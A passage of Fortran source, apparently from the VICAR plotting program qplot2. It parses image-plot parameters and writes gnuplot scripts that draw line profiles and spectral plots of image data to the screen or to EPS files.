plotgpi2=plotout(1:nplotout)//eps//gpi
nplotgpi2=index(plotgpi2,' ') - 1
ploteps=plotout(1:nplotout)//eps
nploteps=index(ploteps,' ') - 1
tbl = plotout(1:nplotout)//asc
ntbl = index(tbl,' ') - 1
tmptbl = tbl(1:ntbl)
c Plotout and nplotout from above
elseif (cbuf .eq. "NONE" .or. cbuf .eq."none") then
c epsplot = .false.
plotgpi='qplot.gpi'
nplotgpi=index(plotgpi,' ') - 1
else
plotout = CBUF
nplotout=index(plotout,' ') - 1
plotgpi=plotout(1:nplotout)//gpi
nplotgpi=index(plotgpi,' ') - 1
plotgpi2=plotout(1:nplotout)//eps//gpi
nplotgpi2=index(plotgpi2,' ') - 1
ploteps=plotout(1:nplotout)//eps
nploteps=index(ploteps,' ') - 1
tbl = plotout(1:nplotout)//asc
ntbl = index(tbl,' ') - 1
tmptbl = tbl(1:ntbl)
c epsplot = .true.
endif
ELSE
c epsplot = .false.
plotgpi='qplot.gpi'
nplotgpi=index(plotgpi,' ') - 1
tbl = plotout(1:nplotout)//asc
ntbl = index(tbl,' ') - 1
END IF
GTYPE=0 !graph type: 1=PROCESS 2=SPROCESS
NCHAN=1 !number of channels (bands in MSS data)
! 5 bands
SIZE=.10
isize = 10 !gnuplot file
psize = 16 !eps file
displace=0.
RDS=0.
NTITX=22
NTITY=8
NTITLE=13
NORM=.FALSE.
nolabel=.false. !Put vicar labels on graph
TICS=1 !set default to tics
LABTOP=1
TTLTOP=1
XLNGTH=9.0
YLNGTH=7.0
XSCLMN=1.
XSCLMX=1.
YSCLMN=0.
YSCLMX=0.
xsclset = .false.
ysclset = .false.
TTL='IPL LINE PLOT'
XTTL='RELATIVE SAMPLE NUMBER'
YTTL='DN VALUE'
DO 5 J=1,10
XMIN(J)=0.
XMAX(J)=0.
YMIN(J)=0.
YMAX(J)=255.
5 CONTINUE
XPAGE=0.5
iiline = 1
i2line = 0
C
C OPEN INPUT DATA SETS
C
CALL XVP('INP',LPARM,NI) !max = 10
DO 10 I=1,NI
CALL XVUNIT(UNIT(I),'INP',I,STAT,' ')
CALL XVOPEN(UNIT(I),STAT,'U_FORMAT','REAL',' ')
CALL XVGET(UNIT(I),STAT,'NL',NLI(I),'NS',NSI(I),
& 'FORMAT',FORMAT(I),'NB',NBI(I),' ')
c IF (FORMAT(I) .EQ. 'HALF') HALF(I)=1
c print *, 'Number of bands = ',nbi(i)
if (nbi(i) .gt. 1) then
call xvmessage("??E - Multiband images not supported"," ")
call xvmessage(" Convert to MSS format with TRAN"," ")
call abend
endif
10 CONTINUE
c
CALL XVP('INP',FILENAME,ICOUNT) !INPUT FILENAMES
C
C *** PROCESS PARAMETERS ***
C
C 'NCHAN'
CALL XVPARM('NCHAN',NCHAN,ICOUNT,IDEF,1)
NSCHAN=NSI(1)/NCHAN
c print *,"nchan = ",nchan
C 'PROCESS' - profile plot for
CALL XVPARM('PROCESS',IPARM,ICOUNT,IDEF,50)
c 5 numbers, DataSetNum SL,SS,EL,ES
IF (ICOUNT .NE. 0) THEN
GTYPE=1
NLINES=ICOUNT/5
IF (5*NLINES .NE. ICOUNT) THEN
CALL XVMESSAGE('??E - Invalid count for parameter "PROCESS"',' ')
CALL ABEND
END IF
DO I=1,NLINES
IN(I)=IPARM(5*(I-1)+1)
SL(I)=IPARM(5*(I-1)+2)
SS(I)=IPARM(5*(I-1)+3)
EL(I)=IPARM(5*(I-1)+4)
ES(I)=IPARM(5*(I-1)+5)
IF (IN(I) .LT. 1 .OR. IN(I) .GT. NI) THEN
call xvmessage ('??E - Invalid input number specified',' ')
call abend
ENDIF
IF (SL(I) .LT. 1) CALL MABEND('??E - invalid starting line')
IF (SS(I) .LT. 1) CALL MABEND('??E - Invalid starting sample')
IF (EL(I) .GT. NLI(IN(I))) CALL MABEND('??E - invalid ending line')
IF (ES(I) .GT. NSI(IN(I)))CALL MABEND('??E - invalid ending sample')
IF (SL(I) .EQ. EL(I) .AND. SS(I) .EQ. ES(I)) then
call mabend('??E - null line segment specified')
endif
if (format(IN(I)) .EQ. 'HALF') YMAX(I)=32767
if (format(IN(i)) .EQ. 'FULL') YMAX(i)=65536
if (format(IN(i)) .EQ. 'REAL') YMAX(i)=65536.
END DO
END IF
C 'SPROCESS' - Spectral Plots
CALL XVPARM('SPROCESS',IPARM,ICOUNT,IDEF,20)
c print *,"sprocess icount = ",icount," idef = ",idef
IF (ICOUNT .NE. 0) THEN
IF (GTYPE .NE. 0) THEN
CALL XVMESSAGE
& ('??E - Cannot specify both PROCESS and SPROCESS',' ')
CALL ABEND
END IF
IF (NI .NE. 1) THEN
CALL XVMESSAGE
& ('??E - Spectral plots require 1 input in MSS format',' ')
CALL ABEND
END IF
IF (NCHAN .EQ. 1) THEN
CALL XVMESSAGE('??E - Must specify nchan for spectral plots',' ')
CALL ABEND
END IF
GTYPE=2
NLINES=ICOUNT/2
IF (2*NLINES .NE. ICOUNT) THEN
CALL XVMESSAGE('??E - invalid count for parameter "SPROCESS"',' ')
CALL ABEND
END IF
DO I=1,NLINES
IN(I)=1
SL(I)=IPARM(2*(I-1)+1)
SS(I)=IPARM(2*(I-1)+2)
c print *, "sl,ss = ",sl(i),ss(i)
END DO
TITLE = 'IPL SPECTRAL PLOT'
c NTITLE=17 - change to automatically compute string length if TITLE were to change
ntitle = index(title,' ') - 1
XTITLE = 'CHANNEL NUMBER'
c NTITX=14
ntitx = index(xtitle,' ') - 1
c IF (FORMAT(1) .EQ. 'HALF') YMAX(1)=32767
END IF !IF (ICOUNT .NE. 0)
C 'LABELSIZ'
CALL XVPARM('LABELSIZ',ISIZE,ICOUNT,IDEF,1) !font in points
c print *, 'size = ',isize
C 'LOLABEL'
IF (XVPTST('LOLABEL')) LABTOP=0
c 'Nolabel'
if (XVPTST('NOLABEL')) nolabel=.true.
C 'TICS'
IF (XVPTST('NOTICS')) TICS=0
C 'DISPLACEMENT'
CALL XVPARM('DISPLACE',displace,ICOUNT,IDEF,1)
plotwid = 648 !640 @72dpi = 8.888.. inches 9 inch = 648
plotht = 504 !480 @72dpi = 6.666.. inches 7 inch = 504
C 'XLENGTH'
CALL XVPARM('XLENGTH',XLNGTH,ICOUNT,IDEF,1)
c if idef = 1 then default used
if (idef.eq.0) then
plotwid = 72 * xlngth
endif
C 'YLENGTH'
CALL XVPARM('YLENGTH',YLNGTH,ICOUNT,IDEF,1)
if (idef.eq.0) then
plotht = 72 * ylngth
endif
C 'XSCALE'
CALL XVPARM('XSCALE',RPARM,ICOUNT,IDEF,2)
IF(ICOUNT .EQ. 2) THEN
XSCLMN=RPARM(1)
XSCLMX=RPARM(2)
xsclset = .true.
ENDIF
C 'YSCALE'
CALL XVPARM('YSCALE',RPARM,ICOUNT,IDEF,2)
IF(ICOUNT .EQ. 2) THEN
YSCLMN=RPARM(1)
YSCLMX=RPARM(2)
ysclset = .true.
ENDIF
C 'XVALUES'
CALL XVPARM('XVALUES',RPARM,ICOUNT,IDEF,20)
IF(ICOUNT .GE. 2) THEN
N=ICOUNT/2
IF (2*N.NE.ICOUNT) THEN
CALL XVMESSAGE('??E - invalid count for parameter "XVALUES"',' ')
CALL ABEND
END IF
DO I=1,N
XMIN(I)=RPARM(2*(I-1)+1)
XMAX(I)=RPARM(2*(I-1)+2)
END DO
ENDIF
C 'YVALUES'
CALL XVPARM('YVALUES',RPARM,ICOUNT,IDEF,20)
IF(ICOUNT .GE. 2) THEN
N=ICOUNT/2
IF (2*N .NE. ICOUNT) THEN
CALL XVMESSAGE('??E - Invalid count for parameter "YVALUES"',' ')
CALL ABEND
END IF
DO I=1,N
YMIN(I)=RPARM(2*(I-1)+1)
YMAX(I)=RPARM(2*(I-1)+2)
END DO
ENDIF
C 'LOTITLE'
IF (XVPTST('LOTITLE')) TTLTOP=0
C 'NORM'
NORM = XVPTST('NORM')
IF (NORM) YLNGTH=5.
IF (NORM) YSCLMX=1.
C 'RDS'
CALL XVPARM('RDS',RDS,ICOUNT,IDEF,1)
C 'XTITLE'
CALL XVPARM('XTITLE',CBUF,ICOUNT,IDEF,1)
IF (CBUF .NE. XTTL) THEN
XTITLE = ' '
WRITE(XTITLE(1:),'(A)') CBUF
NTITX=INDEX(CBUF,' ') - 1
IF (NTITX .LE. 0) NTITX=52
END IF
C 'YTITLE'
CALL XVPARM('YTITLE',CBUF,ICOUNT,IDEF,1)
IF (CBUF .NE. YTTL) THEN
YTITLE = ' '
WRITE(YTITLE(1:),'(A)') CBUF
NTITY=INDEX(CBUF,' ') - 1
IF (NTITY .LE. 0) NTITY=52
END IF
C 'TITLE'
CALL XVPARM('TITLE',CBUF,ICOUNT,IDEF,1)
IF (CBUF .NE. TTL) THEN
TITLE = ' '
WRITE(TITLE(1:),'(A)') CBUF
NTITLE=INDEX(CBUF,' ') - 1
IF (NTITLE .LE. 0) NTITLE=52
END IF
C
C FIND LENGTH OF LONGEST LINE
NP=0
IF (GTYPE .EQ. 1) THEN !PROCESS
c NP=0
DO J=1,NLINES
NX=IABS(SL(J)-EL(J))
NY=IABS(SS(J)-ES(J))
NTEST=SQRT(FLOAT(NX*NX+NY*NY))+1
IF (NTEST .GT. NP) NP=NTEST
ENDDO
ENDIF
c print *, "np = ",np
IF (GTYPE .EQ. 2) NP=NCHAN !SPROCESS
C
C LX IS NUMBER OF BYTES NEEDED FOR X ARRAY.
C (ONE FULLWORD FOR EACH PT. PLUS TWO MORE FOR XSCLMN AND XSCLDT)
c used for stacka
LX=4*(NP+2)
LY=LX
LCHECK=LX !check of bytes
C
C DRAW X AXIS
GOTO 230
XSCLDT=(XSCLMX-XSCLMN)/XLNGTH
IF (XSCLDT .NE. 0.) GO TO 230
XAXIS(1)=XMIN(1)
XAXIS(2)=XMAX(1)
DO J=1,NLINES
XAXIS(1)=AMIN1(XAXIS(1),XMIN(J))
XAXIS(2)=AMAX1(XAXIS(2),XMAX(J))
END DO
IF (XAXIS(1) .GE. XAXIS(2)) XAXIS(2)=NP
ccc--- CALL SCALE(XAXIS,XLNGTH,2,1)
XAXIS(4) = XSCLDT
XAXIS(3) = XSCLMN
c -- the following is not really needed with gnuplot
230 continue
IF (TICS .EQ. 1) THEN
C SMALL
NTICS=10*XLNGTH
NTICS=2*XLNGTH
END IF
C
C DRAW Y AXIS
GOTO 330
YSCLDT=(YSCLMX-YSCLMN)/YLNGTH
IF (YSCLDT .NE. 0) GO TO 330
YAXIS(1)=YMIN(1)
YAXIS(2)=YMAX(1)
DO J=1,NLINES
YAXIS(1)=AMIN1(YAXIS(1),YMIN(J))
YAXIS(2)=AMAX1(YAXIS(2),YMAX(J))
END DO
ccc--- CALL SCALE(YAXIS,YLNGTH,2,1)
YAXIS(3) = YSCLMN
YAXIS(4) = YSCLDT
YSCLMX=YSCLMN+YLNGTH*YSCLDT
c -- the following is not really needed with gnuplot
330 Continue
IF (TICS .EQ. 1) THEN
C SMALL
NTICS=10*YLNGTH
NTICS=2*YLNGTH
END IF
C
C DRAW TITLE (DEFAULT = 'IPL LINE PLOT')
headermsg(iiline) = title
iiline = iiline + 1 !+ 3
c -- the following is not really needed with gnuplot
c here is where "line" is called
c labels (1) = ' '
c do II = 1, 10
c write (msg (1:),'(a)') 'Line '
c write (msg (6:),'(i2)') II
c write (msg (9:50),'(a)') filename(ii)(1:40)
c labels (II+1) = msg
c print *,'label (ii+1) = ', labels (II+1)
c end do
c print *,'before DO 850 ILINE=1,NLINES tbl = ',tbl(1:ntbl)
C
DO 850 ILINE=1,NLINES
C SET LB=1 IF DATA SET IS SAME AS PREVIOUS ONE
LB=0
IF (ILINE .GT. 1) THEN
IF (IN(ILINE) .EQ. IN(ILINE-1)) LB=1
END IF
if (iline .eq. 6) then
i2line = iiline
headermsg(iiline) = title
iiline = iiline + 3
endif
C
C ENSURE X ARRAY IS LARGE ENOUGH TO USE AS INPUT BUFFER ALSO
IF (LX .LT. 4*NSI(IN(ILINE))) LX=4*NSI(IN(ILINE))
C
C CALL SUBROUTINE GRAPH VIA STACKA AND EQUIV
c
c print *, 'before CALL STACKA(9,EQUIV,.... tmptbl = ',tmptbl(1:ntbl)
CALL STACKA(9,EQUIV,2,LX,LY,LCHECK,iline,IND,tmptbl,ntbl)
IF (IND .EQ. 1) GO TO 999
c print *, 'after CALL STACKA(9,EQUIV,.... tmptbl = ',tmptbl(1:ntbl)
850 CONTINUE
c print *, "y-",ysclmn, ysclmx
c print *, "x-",xsclmn, xsclmx
c This calculation is used for positioning the labels on the chart
c original method was percentage of height in fpos
cc labstep = 0.04
iiline = iiline - 2
cc go to 10000
c c if (iiline .gt. 16) then
cc tmp = iiline/16
cc plotht = int(plotht * 0.75*tmp)
cc labstep =(labstep/tmp)
cc endif
c compute y-scale height
cc tmp = ysclmx - ysclmn
cc ysclmx = ysclmx + 50*labstep*ysclmx
cc if ((ysclmx-ysclmn) .gt. 2*tmp) ysclmx = 2*tmp
cc10000 continue
charsize = 9
charsteps = (plotht)/(charsize*2) + 4 !divide by 2 for line spacing
if (charsteps .gt. 54) charsteps = charsteps - 1 !adjust for floating point
c print *, 'charsteps = ',charsteps
if (iiline .gt. (charsteps - 5).and. .not.nolabel) then
write (msg,10010)
10010 format ('Plot needs to be taller for all labels to print' )
call xvmessage(msg,' ')
endif
cc
cc open gpi data set
cc
open(98,file=plotgpi(1:nplotgpi),status='UNKNOWN',iostat=jj,err=995)
10100 format('# Created by program qplot2') !#'s are ignored in gnuplot
write(98,fmt=10100,iostat=jj,err=995)
10105 format('# Gnuplot commands for line plot(s)')
write(98,fmt=10105,iostat=jj,err=995)
10110 format('# Data in ',a)
write(98,fmt=10110,iostat=jj,err=995) tbl(1:ntbl)
10115 format('set term x11 font "ariel,',i2,'" size ',i4,', ',i4)
C size = XX,YY
write(98,fmt=10115,iostat=jj,err=995) isize,plotwid,plotht
10116 format('set output') !set output to screen
write(98,fmt=10116,iostat=jj,err=995)
if (tics .eq. 1) then
10120 format('set grid ')
write(98,fmt=10120,iostat=jj,err=995)
else
10121 format ("set noxtics")
write(98,fmt=10121,iostat=jj,err=995)
10122 format ("set noytics")
write(98,fmt=10122,iostat=jj,err=995)
endif
10125 format("set ylab '",a,"'" )
write(98,fmt=10125,iostat=jj,err=995) ytitle(1:ntity)
10130 format("set xlab '",a,"'")
write(98,fmt=10130,iostat=jj,err=995) xtitle(1:ntitx)
10141 format("set clip points") !how to deal with points out of range
write(98,fmt=10142,iostat=jj,err=995)
10142 format("set clip one") !how to deal with connecting lines out of range
write(98,fmt=10141,iostat=jj,err=995)
10145 format('set title "',a,'" font "Ariel,',i2,'"')
write(98,fmt=10145,iostat=jj,err=995) title(1:ntitle),isize
10135 format("set yrange [",f8.0,":",f8.0,"]")
write(98,fmt=10135,iostat=jj,err=995) ysclmn,ysclmx
10140 format("set xrange [",f8.0,":",f7.0,"]")
write(98,fmt=10140,iostat=jj,err=995) xsclmn,xsclmx
cc go to 11000
c output labels for only top 60% of plot
cc fpos=1.0 ! + labstep
cc do ii=2,iiline
cc i = ii - 1
cc fpos = fpos - labstep
cc10160 format('set label ',i2,' "',a,'" at graph .30 ,',f5.2,
cc 1 ' font "ariel,9" front nopoint tc def')
c 1 ' font "ariel 8" front nopoint tc def')
cc write(98,fmt=10160,iostat=jj,err=995) i,headermsg(ii)(1:nheadermsg(ii)), fpos
cc print 10160, i,headr(ii)(1:nheadr(ii)), fpos
cc10155 format("set label 2 '",a,"' at graph 0.4, 0.90 front nopoint tc def")
cc write(98,fmt=10155,iostat=jj,err=995) headr(3)
cc enddo
cc11000 continue
if (.not.nolabel) then
do ii=2,iiline
i = ii - 1
j = charsteps - ii
10170 format('set label ',i2,' "',a,'" at character 15 ,',i2,
1 ' font "ariel,9" front nopoint tc def')
c 1 ' font "ariel 8" front nopoint tc def')
write(98,fmt=10170,iostat=jj,err=995) i,headermsg(ii)(1:nheadermsg(ii)), j
enddo
!! Display labels on the 2nd and possibly the 3rd page
if (i2line .eq. 0) then
!! If i2line == 0, then 5 or less samples
ccc--- call header (headermsg, iiline, 0) !! Title string, lines, adjust left
else
!! Display first set of labels and header
endif
endif !if (.not.nlabel
if (nlines .eq. 1) then
iline=1
ntmptbl=index(tmptbl,' ') - 1
tbl=tmptbl(1:ntmptbl)//num(iline)
ntbl=index(tbl,' ') - 1
c print *, 'if (nlines .eq. 1) tbl = ',tbl(1:ntbl)
if (gtype .eq. 1) then
alinenum=aline//num(iline)
naline=index(alinenum,' ') - 1
else
write (alinenum,10248) sl(iline),ss(iline)
10248 format("pixel[",i4,",",i4,"]")
naline=index(alinenum,' ') - 1
endif
10250 format("plot '",a,"' u 1:2 t '",a,"' w linespoints lt ",i2,
1 " pt ",i2," ps 2 lc rgb '",a,"'")
write(98,fmt=10250,iostat=jj,err=995) tbl(1:ntbl),alinenum(1:naline),
1 lntype(iline),pttype(iline),ptcolor(iline)(1:ptcolorl(iline))
elseif (nlines .eq. 2) then
iline = 1
ntmptbl=index(tmptbl,' ') - 1
tbl=tmptbl(1:ntmptbl)//num(iline)
ntbl=index(tbl,' ') - 1
c print *, 'if (nlines .eq. 2) tbl = ',tbl(1:ntbl)
if (gtype .eq. 1) then
alinenum=aline//num(iline)
naline=index(alinenum,' ') - 1
else
write (alinenum,10248) sl(iline),ss(iline)
naline=index(alinenum,' ') - 1
endif
c terminated with bash
10251 format("plot '",a,"' u 1:2 t '",a,"' w linespoints lt ",i2,
1 " pt ",i2," ps 2 lc rgb '",a,"', ",a)
write(98,fmt=10251,iostat=jj,err=995) tbl(1:ntbl),
1 alinenum(1:naline),
1 lntype(iline),pttype(iline),ptcolor(iline)(1:ptcolorl(iline)),
1 bash
iline = 2
ntmptbl=index(tmptbl,' ') - 1
tbl=tmptbl(1:ntmptbl)//num(iline)
ntbl=index(tbl,' ') - 1
c print *, 'iline .eq. 2 tbl = ',tbl(1:ntbl)
if (gtype .eq. 1) then
alinenum=aline//num(iline)
naline=index(alinenum,' ') - 1
else
write (alinenum,10248) sl(iline),ss(iline)
naline=index(alinenum,' ') - 1
endif
10252 format (" '",a,"' u 1:2 t '",a,"' w linespoints lt ",i2,
1 " pt ",i2," ps 2 lc rgb '",a,"'")
write(98,fmt=10252,iostat=jj,err=995) tbl(1:ntbl),alinenum(1:naline),
1 lntype(iline),pttype(iline),ptcolor(iline)(1:ptcolorl(iline))
elseif (nlines .gt. 2) then
iline = 1
ntmptbl=index(tmptbl,' ') - 1
tbl=tmptbl(1:ntmptbl)//num(iline)
ntbl=index(tbl,' ') - 1
c print *, 'elseif (nlines .gt. 2) tbl = ',tbl(1:ntbl)
if (gtype .eq. 1) then
alinenum=aline//num(iline)
naline=index(alinenum,' ') - 1
else
write (alinenum,10248) sl(iline),ss(iline)
naline=index(alinenum,' ') - 1
endif
write(98,fmt=10251,iostat=jj,err=995) tbl(1:ntbl),
1 alinenum(1:naline),
1 lntype(iline),pttype(iline),ptcolor(iline)(1:ptcolorl(iline)),
1 bash
do iline=2,nlines-1
ntmptbl=index(tmptbl,' ') - 1
tbl=tmptbl(1:ntmptbl)//num(iline)
ntbl=index(tbl,' ') - 1
c print *, 'do iline=2,nlines-1 ntbl = ',tbl(1:ntbl)
if (gtype .eq. 1) then
alinenum=aline//num(iline)
naline=index(alinenum,' ') - 1
else
write (alinenum,10248) sl(iline),ss(iline)
naline=index(alinenum,' ') - 1
endif
10253 format (" '",a,"' u 1:2 t '",a,"' w linespoints lt ",i2,
1 " pt ",i2," ps 2 lc rgb '",a,"', ",a)
write(98,fmt=10253,iostat=jj,err=995) tbl(1:ntbl),
1 alinenum(1:naline),
1 lntype(iline),pttype(iline),ptcolor(iline)(1:ptcolorl(iline)),
1 bash
enddo
iline = nlines
ntmptbl=index(tmptbl,' ') - 1
tbl=tmptbl(1:ntmptbl)//num(iline)
ntbl=index(tbl,' ') - 1
c print *, 'iline = nlines tbl = ',tbl(1:ntbl)
if (gtype .eq. 1) then
alinenum=aline//num(iline)
naline=index(alinenum,' ') - 1
else
write (alinenum,10248) sl(iline),ss(iline)
naline=index(alinenum,' ') - 1
endif
write(98,fmt=10252,iostat=jj,err=995) tbl(1:ntbl),alinenum(1:naline),
1 lntype(iline),pttype(iline),ptcolor(iline)(1:ptcolorl(iline))
endif
10255 format("pause mouse any") !allows plot to display on screen until mouse click
write(98,fmt=10255,iostat=jj,err=995)
close(98)
if (epsplot) then
cc
cc open eps data set
cc
open(97,file=plotgpi2(1:nplotgpi2),status='UNKNOWN',iostat=jj,err=996)
write(97,fmt=10100,iostat=jj,err=996)
write(97,fmt=10105,iostat=jj,err=996)
write(97,fmt=10110,iostat=jj,err=996) tbl(1:ntbl)
10300 format('set terminal postscript eps enhanced "Ariel" ',i2,' size 11 ,8')
write(97,fmt=10300,iostat=jj,err=996) psize ! plotwid,plotht
10305 format("set output '",a,"'")
write(97,fmt=10305,iostat=jj,err=996) ploteps(1:nploteps)
if (tics .eq. 1) then
write(97,fmt=10120,iostat=jj,err=995)
else
write(97,fmt=10121,iostat=jj,err=995)
write(97,fmt=10122,iostat=jj,err=995)
endif
write(97,fmt=10125,iostat=jj,err=996) ytitle(1:ntity)
write(97,fmt=10130,iostat=jj,err=996) xtitle(1:ntitx)
write(97,fmt=10142,iostat=jj,err=996)
write(97,fmt=10141,iostat=jj,err=996)
write(97,fmt=10145,iostat=jj,err=996) title(1:ntitle),psize
write(97,fmt=10135,iostat=jj,err=996) ysclmn,ysclmx
write(97,fmt=10140,iostat=jj,err=996) xsclmn,xsclmx
c output labels for only top 60% of plot
cc fpos=1.0 + labstep
cc do ii=2,iiline
cc i = ii - 1
cc fpos = fpos - labstep
cc10161 format('set label ',i2,' "',a,'" at graph .30 ,',f5.2,
cc 1 ' font "ariel,16" front nopoint tc def')
c 1 ' font "ariel 8" front nopoint tc def')
cc write(97,fmt=10161,iostat=jj,err=996) i,headermsg(ii)(1:nheadermsg(ii)), fpos
cc print 10160, i,headr(ii)(1:nheadr(ii)), fpos
cc10155 format("set label 2 '",a,"' at graph 0.4, 0.90 front nopoint tc def")
cc write(98,fmt=10155,iostat=jj,err=995) headr(3)
cc enddo
c
do ii=2,iiline
i = ii - 1
j = charsteps - ii
c 1 ' font "ariel 8" front nopoint tc def')
write(97,fmt=10170,iostat=jj,err=995) i,headermsg(ii)(1:nheadermsg(ii)), j
enddo
if (nlines .eq. 1) then
iline=1
ntmptbl=index(tmptbl,' ') - 1
tbl=tmptbl(1:ntmptbl)//num(iline)
ntbl=index(tbl,' ') - 1
if (gtype .eq. 1) then
alinenum=aline//num(iline)
naline=index(alinenum,' ') - 1
else
write (alinenum,10248) sl(iline),ss(iline)
naline=index(alinenum,' ') - 1
endif
write(97,fmt=10250,iostat=jj,err=996) tbl(1:ntbl),alinenum(1:naline),
1 lntype(iline),pttype(iline),ptcolor(iline)(1:ptcolorl(iline))
elseif (nlines .eq. 2) then
iline = 1
ntmptbl=index(tmptbl,' ') - 1
tbl=tmptbl(1:ntmptbl)//num(iline)
ntbl=index(tbl,' ') - 1
if (gtype .eq. 1) then
alinenum=aline//num(iline)
naline=index(alinenum,' ') - 1
else
write (alinenum,10248) sl(iline),ss(iline)
naline=index(alinenum,' ') - 1
endif
write(97,fmt=10251,iostat=jj,err=996) tbl(1:ntbl),
1 alinenum(1:naline),
1 lntype(iline),pttype(iline),ptcolor(iline)(1:ptcolorl(iline)),
1 bash
iline = 2
ntmptbl=index(tmptbl,' ') - 1
tbl=tmptbl(1:ntmptbl)//num(iline)
ntbl=index(tbl,' ') - 1
if (gtype .eq. 1) then
alinenum=aline//num(iline)
naline=index(alinenum,' ') - 1
else
write (alinenum,10248) sl(iline),ss(iline)
naline=index(alinenum,' ') - 1
endif
write(97,fmt=10252,iostat=jj,err=996) tbl(1:ntbl),alinenum(1:naline),
1 lntype(iline),pttype(iline),ptcolor(iline)(1:ptcolorl(iline))
elseif (nlines .gt. 2) then
iline = 1
ntmptbl=index(tmptbl,' ') - 1
tbl=tmptbl(1:ntmptbl)//num(iline)
ntbl=index(tbl,' ') - 1
if (gtype .eq. 1) then
alinenum=aline//num(iline)
naline=index(alinenum,' ') - 1
else
write (alinenum,10248) sl(iline),ss(iline)
naline=index(alinenum,' ') - 1
endif
write(97,fmt=10251,iostat=jj,err=996) tbl(1:ntbl),
1 alinenum(1:naline),
1 lntype(iline),pttype(iline),ptcolor(iline)(1:ptcolorl(iline)),
1 bash
do iline=2,nlines-1
ntmptbl=index(tmptbl,' ') - 1
tbl=tmptbl(1:ntmptbl)//num(iline)
ntbl=index(tbl,' ') - 1
if (gtype .eq. 1) then
alinenum=aline//num(iline)
naline=index(alinenum,' ') - 1
else
write (alinenum,10248) sl(iline),ss(iline)
naline=index(alinenum,' ') - 1
endif
write(97,fmt=10253,iostat=jj,err=996) tbl(1:ntbl),
1 alinenum(1:naline),
1 lntype(iline),pttype(iline),ptcolor(iline)(1:ptcolorl(iline)),
1 bash
enddo
iline = nlines
ntmptbl=index(tmptbl,' ') - 1
tbl=tmptbl(1:ntmptbl)//num(iline)
ntbl=index(tbl,' ') - 1
if (gtype .eq. 1) then
alinenum=aline//num(iline)
naline=index(alinenum,' ') - 1
else
write (alinenum,10248) sl(iline),ss(iline)
naline=index(alinenum,' ') - 1
endif
write(97,fmt=10252,iostat=jj,err=996) tbl(1:ntbl),alinenum(1:naline),
1 lntype(iline),pttype(iline),ptcolor(iline)(1:ptcolorl(iline))
endif
close(97)
endif
C
C CLOSE INPUT DATA SETS
c 9999 continue
DO I=1,NI
CALL XVCLOSE(UNIT(I),STAT,' ')
ENDDO
C
RETURN
C
995 call xvmessage('??E - Error opening/writing gnuplot file',' ')
call abend
996 call xvmessage('??E - Error opening/writing gnuplot eps file',' ')
call abend
999 CALL XVMESSAGE('??E - Stacka error',' ')
CALL ABEND
END
C
C **********************************************************
C
SUBROUTINE EQUIV(X,LX,Y,LY,LCHECK,LINE,IND,tmptbl,ntbl)
c X is array of LX bytes
c Y is array of LY bytes
c LCHECK verifies the the number of bytes in LY
c IND is a return, 0=OK, 1= insufficient memory
c
implicit none
C
integer*4 ind,lcheck,lx,ly,dum
integer*4 line,ntbl
real*4 x(lx),y(ly)
character*24 tmptbl
c
IND=0
dum=lx !to suppress warning msg in compiler
IF (LY .LT. LCHECK) GO TO 899
CALL GRAPH(X,X,Y,line,tmptbl,ntbl) !,tbl,ntbl)
RETURN
C
C INSUFFICIENT MEMORY RETURN
899 IND=1
RETURN
END
C
C **********************************************************
C
SUBROUTINE GRAPH(X,RBUF,Y,line,tmptbl,ntbl) !,tbl,ntbl)
implicit none
C
COMMON/C1/ SIZE,displace,RDS,XMIN,XMAX,YMIN,YMAX
& ,XSCLMN,XSCLMX,YSCLMN,YSCLMX,XSCLDT
& ,YSCLDT,XLNGTH,YLNGTH,FORMAT,NORM,NCHAN
& ,xsclset,ysclset
COMMON/C2/ SLX,SSX,ELX,ESX,INX,UNIT,ILINE,NLINES
& ,NLI,NSI,NSCHAN,GTYPE,XPAGE,LB,LABTOP
common/files/filename
common/commonheader/headermsg,nheadermsg,iiline,i2line
c
integer*4 iiline,i2line,nheadermsg(220) !! index into header strings
C
REAL*8 MEAN,SIGMA,DBLV
REAL*4 XMAX(10),XMIN(10),YMAX(10),YMIN(10)
REAL*4 XSCLMN,XSCLMX,YSCLMN,YSCLMX
REAL*4 TXSCLMN,TXSCLMX,TYSCLMN,TYSCLMX
REAL*4 XLNGTH,YLNGTH
REAL*4 X(1),RBUF(1),Y(1),YT(4)
real*4 adx,ady,dnmax,displace,dx,dy,dz,rds,size
real*4 xinc,xl,xl1,xl2,xpage,xscldt,yinc,ypage,ypeak,yscldt
INTEGER*4 INX(10),SLX(10),SSX(10),ELX(10),ESX(10),NLI(10),NSI(10)
INTEGER*4 UNIT(10),SN,SL,SS,EL,ES,STAT,GTYPE,sinc
integer*4 id,idense,ilab,iline,in,inline,inteq,ipt,iq
integer*4 labtop,lb,linc,ln,ln2,nchan,nlab,nlines,npts
integer*4 nsamp,nschan,nx,ny,ntmptbl,ntbl
integer*4 i,j,line
LOGICAL*4 NORM,xsclset,ysclset
character*1 tab
character*4 format(10)
character*24 tbl,tmptbl
CHARACTER*24 STLAB1
CHARACTER*12 STLAB2
CHARACTER*56 LABEL(20),xheadermsg
character*56 headermsg(220) !! Labels * (lines per label+2)
character*120 filename(10)
C
character*1 num(5)
c
data num/'1','2','3','4','5'/
c data tmptbl/'tmptbl.'/
STLAB1 = 'AVE GRAY LEVEL = '
STLAB2 = 'STD DEV = '
MEAN=0.0
SIGMA=0.0
INTEQ=ILINE-1
IN=1
LN=SLX(ILINE)
SN=SSX(ILINE)
C
LINC=0
SINC=0
txsclmn = 40000000
txsclmx = 1
tysclmn = 40000000
tysclmx = 0
if (line .gt. 1) then
txsclmn = xsclmn
txsclmx = xsclmx
tysclmn = ysclmn
tysclmx = ysclmx
endif
IF (GTYPE .EQ. 1) THEN
C
IN=INX(ILINE)
SL=SLX(ILINE)
SS=SSX(ILINE)
EL=ELX(ILINE)
ES=ESX(ILINE)
NSAMP=MAX0(SS,ES)
c LINC=0
IF (EL .GT. SL) LINC=+1
IF (EL .LT. SL) LINC=-1
c SINC=0
IF (ES .GT. SS) SINC=+1
IF (ES .LT. SS) SINC=-1
END IF
C
IF (GTYPE .EQ. 2) GO TO 400
IF (EL .EQ. SL) GO TO 100
IF (ES .EQ. SS) GO TO 200
GO TO 300
C
C HORIZONTAL LINE
100 continue
CALL XVREAD(UNIT(IN),RBUF,STAT,'LINE',LN,'NSAMPS',NSAMP,' ')
C CALL XVCHECK('XVREAD ',1,'INP',IN,STAT)
NPTS=IABS(ES-SS)+1
DO 150 IPT=1,NPTS
Y(IPT)=RBUF(SN)
DBLV=Y(IPT)
MEAN=MEAN+DBLV
